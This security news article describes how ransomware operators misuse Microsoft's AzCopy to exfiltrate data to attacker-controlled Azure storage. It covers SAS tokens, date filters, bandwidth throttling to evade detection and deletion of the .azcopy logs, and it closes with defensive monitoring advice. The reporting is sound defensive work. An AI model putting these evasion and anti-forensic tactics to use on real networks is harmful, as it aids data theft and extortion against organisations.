Trusted Azure Utility AzCopy Turned into Data Exfiltration Tool in Active Ransomware Campaigns

The cybersecurity landscape has taken a sharp and dangerous turn. Ransomware operators, long associated with using suspicious tools to steal data, have begun turning to the same software IT teams rely on every day.

Microsoft’s AzCopy, a legitimate command-line utility built for moving data to and from Azure Storage, has become the latest tool of choice for attackers quietly draining sensitive files from organizations before triggering encryption.

This shift reflects how modern ransomware groups now operate — blending in, staying silent, and using trusted technology against the very organizations it was built to support.

AzCopy was built to simplify large-scale cloud data operations for enterprise environments. It runs as a standalone executable, requires no installation, and transfers data over standard HTTPS connections directly to Microsoft’s Azure infrastructure.

Since it is a recognized and widely used tool in real business operations, most Endpoint Detection and Response (EDR) platforms do not flag its activity as suspicious.

For ransomware operators, this creates ideal cover. By routing stolen data through a trusted utility toward a legitimate cloud provider over normal network channels, attackers can move sensitive files out of a target environment with very little chance of detection.

Varonis Threat Labs researchers identified multiple incidents where AzCopy was used directly as a data exfiltration tool, and in at least one confirmed case, the operation went undetected by the victim organization’s EDR platform.

This points to a deliberate shift in how ransomware operators approach the final and most critical stage of an attack.

Rather than routing stolen data to bulletproof hosting providers — which face growing law enforcement pressure, as demonstrated by the disruption of LockBit’s infrastructure — threat actors now push data into Azure Blob Storage accounts set up in minutes using a credit card or compromised credentials.

The impact of this tactic runs deep. Double extortion ransomware attacks follow a two-stage pattern: attackers first steal sensitive data, then encrypt the organization’s systems, and threaten to publicly release stolen files unless a ransom is paid.

When stolen data moves through Microsoft’s global infrastructure, it looks identical to normal business traffic. Security teams monitoring outbound Azure connections have no built-in reason to flag the activity as harmful.

By the time exfiltration is confirmed and a takedown request is filed, the data has typically been copied elsewhere and eventually surfaces on the attacker’s public leak site.

How Attackers Weaponize AzCopy for Silent Data Theft

Before executing any file transfer, threat actors generate a Shared Access Signature (SAS) token — a self-contained authentication URL granting access to an attacker-controlled Azure Storage account without requiring a username or password.

This token is embedded directly inside the AzCopy command and carries built-in permissions along with start and expiry timestamps.

In investigated cases, the token was active for only three days and eight hours, keeping the exposure window narrow while allowing enough time to complete the full data transfer.

Self-contained authentication URL with embedded permissions and expiry timestamps used by threat actors to access attacker-controlled Azure storage.

The AzCopy command is carefully customized for precision. The --include-after parameter limits transfers to files modified after a specific date, targeting only recent and relevant data.

The --cap-mbps parameter throttles upload speed, making outbound traffic appear steady and consistent rather than triggering spike-based network detection thresholds.

Together, these parameters allow an attacker to extract targeted files quietly, mimicking routine cloud synchronization activity across the network.

Customized AzCopy command targeting financial files with date-filter and speed-throttle parameters designed to evade detection.

By default, AzCopy writes a log file to a hidden directory called .azcopy inside the executing user’s profile, recording every file successfully transferred. This log carries significant forensic value for investigators.

However, in recently investigated cases, attackers deleted this entire directory immediately after completing exfiltration, deliberately wiping the evidence trail of exactly what had been stolen.

Log entries capturing successfully exfiltrated files, serving as a key forensic artifact during incident investigation.

Threat actors removing the .azcopy log directory post-exfiltration to eliminate forensic evidence from the compromised system.

Organizations should monitor outbound connections to *.blob.core.windows.net from systems that do not normally interact with Azure storage.

User and Entity Behavior Analytics (UEBA) can flag unusual file access patterns on service accounts outside established behavior baselines. Application whitelisting should restrict AzCopy execution to only approved systems and accounts.

Incident response plans must be documented and tested in advance, particularly for major containment decisions such as severing internet access during a live ransomware incident.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.